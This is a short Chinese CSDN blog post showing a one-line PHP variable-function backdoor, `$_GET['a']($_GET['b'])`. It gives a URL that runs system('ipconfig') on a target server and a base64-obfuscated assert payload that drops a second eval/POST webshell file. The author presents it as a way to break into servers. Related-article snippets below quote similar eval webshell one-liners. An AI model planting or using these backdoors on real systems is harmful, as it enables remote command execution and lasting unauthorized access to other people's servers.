一个非常简单的php可变函数后门

最新推荐文章于 2024-10-09 14:47:45 发布

EMT00923

最新推荐文章于 2024-10-09 14:47:45 发布

阅读量235

点赞数 1

分类专栏：网络安全 Linux php 文章标签： php 开发语言

本文链接：https://blog.csdn.net/m0_56578216/article/details/132356440

版权

网络安全同时被 3 个专栏收录

101 篇文章 2 订阅 ¥29.90 ¥99.00

订阅专栏

超级会员免费看

Linux

21 篇文章 0 订阅

订阅专栏

php

4 篇文章 0 订阅

订阅专栏

本文介绍了如何利用PHP的可变函数特性构建一个简单的后门。通过GET方法传递参数，这种后门可以执行系统命令，例如显示服务器的IP和网关信息。尽管在某些情况下可能会引发错误，但它仍能成功生成并执行恶意代码，对于服务器安全构成潜在威胁。

摘要由CSDN通过智能技术生成

这是一个非常简单的php可变函数，用get方法传参就能构成后门

<?php
$_GET['a']($_GET['b']);
?>

如在URL中输入下面代码，这个可变函数就相当于system（ipconfig），就能在网页上显示对方服务器的ip、网关等信息。

?a=system&b=ipconfig

如果用get方法输入下面的一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但同样会生成木马，成功达到入侵对方服务器的目的，真可谓不容小觑！

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

EMT00923

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

使用php代码加亮函数构造php小后门

heiyeluren的blog（黑夜路人的开源世界）

03-06

2664

使用php代码加亮函数构造php小后门* 作者: heiyeluren* 时间: 2006-03-05* 博客: http://blog.csdn.net/heiyeshuwu[ 后门构造 ]我们知道php非常强大，并且有很多有趣的功能，比如它就自带了一个php代码加亮的函数，叫做：highlight_string，它的参数就是一个字符串，如果这个字符串中包含了PHP代码，那么它

编写变态的(非字母数字的)PHP后门

代码析构师的专栏

05-09

691

在这篇文章中，我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候，我们首先需要了解一些基础知识： (1)了解PHP (2)了解curl或者其他一些能够操作HTTP请求的工具还有一点需要大家了解的是PHP中异或(^)的概念。对于异或，大家肯定都有所了解，但是平常能用到的地方可能不多，最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概

参与评论您还未登录，请先登录后发表或查看评论

php变量函数后门,项目实战 | 记一次对某猥琐PHP后门的爆菊

weixin_39814482的博客

03-12

584

最近遇到个文件，打开一看只有几行注释？看了下字节数却很大，横向进度条很长啊，通过web访问是空白，看上去应该是藏了后门了。ps:这种方式遇到粗心/没有经验的管理员可能混过去，但若使用win自带的记事本(需开启自动换行)则一览无余。实际上换行整理一下：用Notepad++自带的正则替换简单做了下格式处理。另外在下面的代码中发现了eval/*r49557ec*/(还插了注释，这个小方法很有意思，测试...

php变量函数后门,PHP函数usort是咋回事?还能当后门?

weixin_42299873的博客

03-12

232

开始原谅我见识短,没用过usort函数上面连接的文章中,发现有这个函数于是刚刚了解了下usort函数usort函数干嘛的?通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调function my_sort($a,$b){if ($a==$b){return 0;}else{return ($a}}$list = arra...

手把手教你编写一个简单的PHP模块形态的后门

weixin_34255793的博客

08-03

758

看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit，就能持久接管服务器文章，很感兴趣，苦无作者没留下PoC，自己研究一番，有了此文 0×00. 引言 PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展，所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现...

php eval可变函数,php eval函数的使用

weixin_36281055的博客

03-20

927

eval函数的定义和用法功能eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,并且必须以分号结尾。总这，你要保证php代码能够解析他，就像你在php文件中使用一样。语法eval($strCode)返回值如果没有在代码中调用return语句，则返回NULL,如果代码中存在解析错误，则eval()函数返回false.代码示范：示范代码(eval的基本使用)$strTest=...

php可变方法,php之可变函数使用方法详解

weixin_30476033的博客

03-28

242

这篇文章主要介绍了php之可变函数的实例详解的相关资料,希望通过本文能帮助到大家，让大家理解掌握可变函数，需要的朋友可以参考下php之可变函数的实例详解php的可变函数，今天大概的了解下，是看php手册总结的，觉得用处不大；PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号，PHP 将寻找与变量的值同名的函数，并且尝试执行它。可变函数可以用来实现包括回调函数，函数表在内的一些用途。可变函...

php变量函数后门,PHP中使用按位取反(~)函数创建后门

weixin_39981185的博客

03-12

221

1)PHP ~位运算符PHP: 位运算符 - http://www.php.net/manual/zh/language.operators.bitwise.php前一段时间老外在twitter上爆出个有趣的东西，一串疑似乱码的字符串访问后却能正常输出1337，于是便有了以下研究成果。~ $a Not(按位取反) 将 $a 中为 0 的位设为 1，反之亦然。PHP 的 ini 设定 error_r...

php后门绕过eval关键字,一些变态的PHP一句话后门收集

weixin_42181929的博客

03-18

1798

这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...

PHP WebSehll 后门脚本与检测工具

悦分享

08-01

1450

PHP是一种动态弱类型语言，参数传递、类型转换、函数调用方式都非常灵活，这给开发者带来开发便利的同时，也给攻击者编写各种畸形恶意代码带来了很多便利，通过翻阅PHP手册

msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...

weixin_36005427的博客

03-27

1951

大马：代码量大，体积大，可以和一句话木马配合使用(先传一句话后传大马)，一般同意被发现，可变形或伪装(编码、远程接入)，主要功能：文件管理、，命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用：Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...

php后门文件的免杀总结

W小哥

03-12

664

参考网址：https://xz.aliyun.com/t/5152 一、函数eval 与函数 assert介绍 eval函数 eval 是一个语言构造器而不是一个函数，不能被可变函数调用可变函数：通过一个变量，获取其对应的变量值，然后通过给该值增加一个括号()，让系统认为该值是一个函数，从而当做函数来执行。通俗的说比如 <?php $a=eval;$a() ?> 这样是不行的，也...

PHP常见代码执行后门函数（例如eval和assert）

美奇软件开发工作室

04-23

5926

什么是代码执行：应用程序在调用一些能够将字符串转换为代码的函数（例如php中的eval中），没有考虑用户是否控制这个字符串，将造成代码执行漏洞。常见php代码执行函数介绍常用执行代码函数 1、eval(): <?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行 2、 assert(): 用法和 eval()...

【C语言系统编程】【第三部分：网络编程】3.2 数据传输和协议

10-03

1547

在进行网络编程时，有时需要设计并实现自定义协议，以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性：协议应具有清晰的语法和语义，使开发者能快速理解和实现。扩展性：协议应允许未来的功能扩展，而不破坏现有功能。安全性：数据传输过程中应考虑加密和校验，以保证数据不被篡改。高效性：应尽可能减少网络带宽占用，提升数据传输效率。容错性：协议应能处理各种网络异常情况，如数据丢失、重复和延迟。

【FastAdmin】全栈视角下的页面跳转实现：从原生html、javascrpt、php技术到jQuery、FastAdmin框架

田辛_DensinTian的专栏

10-09

505

页面跳转是Web开发中的基本操作，不同的技术栈提供了不同的实现方法。本文将详细介绍在原生JavaScript、原生HTML、原生PHP、jQuery以及FastAdmin框架中实现页面跳转的各种方法，并分析每种方法的优势、劣势和适用场景。

RCE+[伪协议综合]

2302_81328699的博客

10-03

485

伪协议综合

精品WordPress主题/响应式个人博客主题Kratos

2403_86698467的博客

10-05

615

主题设计简约友好，并且支持响应式，自适应访问，简seo单大方的主页构造，使得博客能在臃肿杂乱的环境中脱颖而出，Kratos内置主题设置，可设置seo关键字及站点描述页面伪静态，自定义的顶部样式（背景图），

wordpress使用popup弹窗插件的对比